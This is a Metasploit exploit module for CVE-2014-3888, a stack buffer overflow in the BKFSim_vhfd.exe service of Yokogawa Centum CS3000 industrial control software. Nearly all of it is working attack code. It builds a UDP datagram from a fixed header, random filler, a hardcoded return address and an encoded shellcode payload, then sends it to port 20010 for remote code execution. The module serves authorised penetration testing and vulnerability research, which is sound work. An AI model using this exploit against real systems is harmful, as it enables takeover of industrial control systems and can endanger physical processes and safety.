GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/scada/yokogawa_bkfsim_vhfd.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Exploit module for CVE-2014-3888, a stack-based buffer overflow in the
# BKFSim_vhfd.exe service of Yokogawa Centum CS3000 (see 'References').
# All network I/O is a single UDP datagram sent to RPORT (default 20010).
# Detection/mitigation guidance: the vendor advisory YSAR-14-0002E and the
# Rapid7 disclosure linked in 'References' cover affected versions and fixes.
class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  # Supplies connect_udp / udp_sock / disconnect_udp used by #exploit.
  include Msf::Exploit::Remote::Udp

  # Declares module metadata (name, description, references, payload
  # constraints, the single tested target, notes) and registers RPORT.
  #
  # @param info [Hash] metadata merged via update_info (Msf convention)
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Yokogawa CS3000 BKFSim_vhfd.exe Buffer Overflow',
        'Description' => %q{
          This module exploits a stack based buffer overflow on Yokogawa CS3000. The vulnerability
          exists in the service BKFSim_vhfd.exe when using malicious user-controlled data to create
          logs using functions like vsprintf and memcpy in an insecure way. This module has been
          tested successfully on Yokogawa Centum CS3000 R3.08.50 over Windows XP SP3.
        },
        'Author' => [
          'Redsadic <julian.vilas[at]gmail.com>',
          'juan vazquez'
        ],
        'References' => [
          ['CVE', '2014-3888'],
          ['URL', 'http://jvn.jp/vu/JVNVU95045914/index.html'],
          ['URL', 'http://www.yokogawa.com/dcs/security/ysar/YSAR-14-0002E.pdf'],
          ['URL', 'https://www.rapid7.com/blog/post/2014/07/07/r7-2014-06-disclosure-yokogawa-centum-cs-3000-bkfsimvhfdexe-buffer-overflow']
        ],
        'Payload' => {
          # Everything is delivered in one datagram, so the payload must fit
          # alongside the header, the filler and the return address.
          'Space' => 1770, # 2228 (max packet length) - 16 (header) - (438 target['Offset']) - 4 (ret)
          'DisableNops' => true,
          'BadChars' => "\x00",
          'PrependEncoder' => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
        'Platform' => 'win',
        'Targets' => [
          [
            'Yokogawa Centum CS3000 R3.08.50 / Windows XP SP3',
            {
              # Build-specific values; only this one target has been tested.
              'Ret' => 0x61e55c9c, # push esp | ret # LibBKCCommon.dll
              'Offset' => 438
            }
          ],
        ],
        'DisclosureDate' => '2014-05-23',
        'DefaultTarget' => 0,
        # Reliability, stability and side effects have not been characterised.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    register_options(
      [
        Opt::RPORT(20010)
      ]
    )
  end

  # Builds and sends the single datagram whose layout the 'Space' comment
  # describes: a fixed 16-byte header, target['Offset'] bytes of random
  # filler, the target return address packed 32-bit little-endian ("V"),
  # then the encoded payload. The socket is opened, written once and closed;
  # the statement order is the wire format and must not be rearranged.
  #
  # @return [void]
  def exploit
    connect_udp

    sploit = "\x45\x54\x56\x48\x01\x01\x10\x09\x00\x00\x00\x01\x00\x00\x00\x44" # header
    sploit << rand_text(target['Offset']) # random filler, length from the target definition
    sploit << [target.ret].pack("V") # 32-bit unsigned little-endian
    sploit << payload.encoded

    # Reported length is the whole datagram, header included.
    print_status("Trying target #{target.name}, sending #{sploit.length} bytes...")
    udp_sock.put(sploit)

    disconnect_udp
  end
end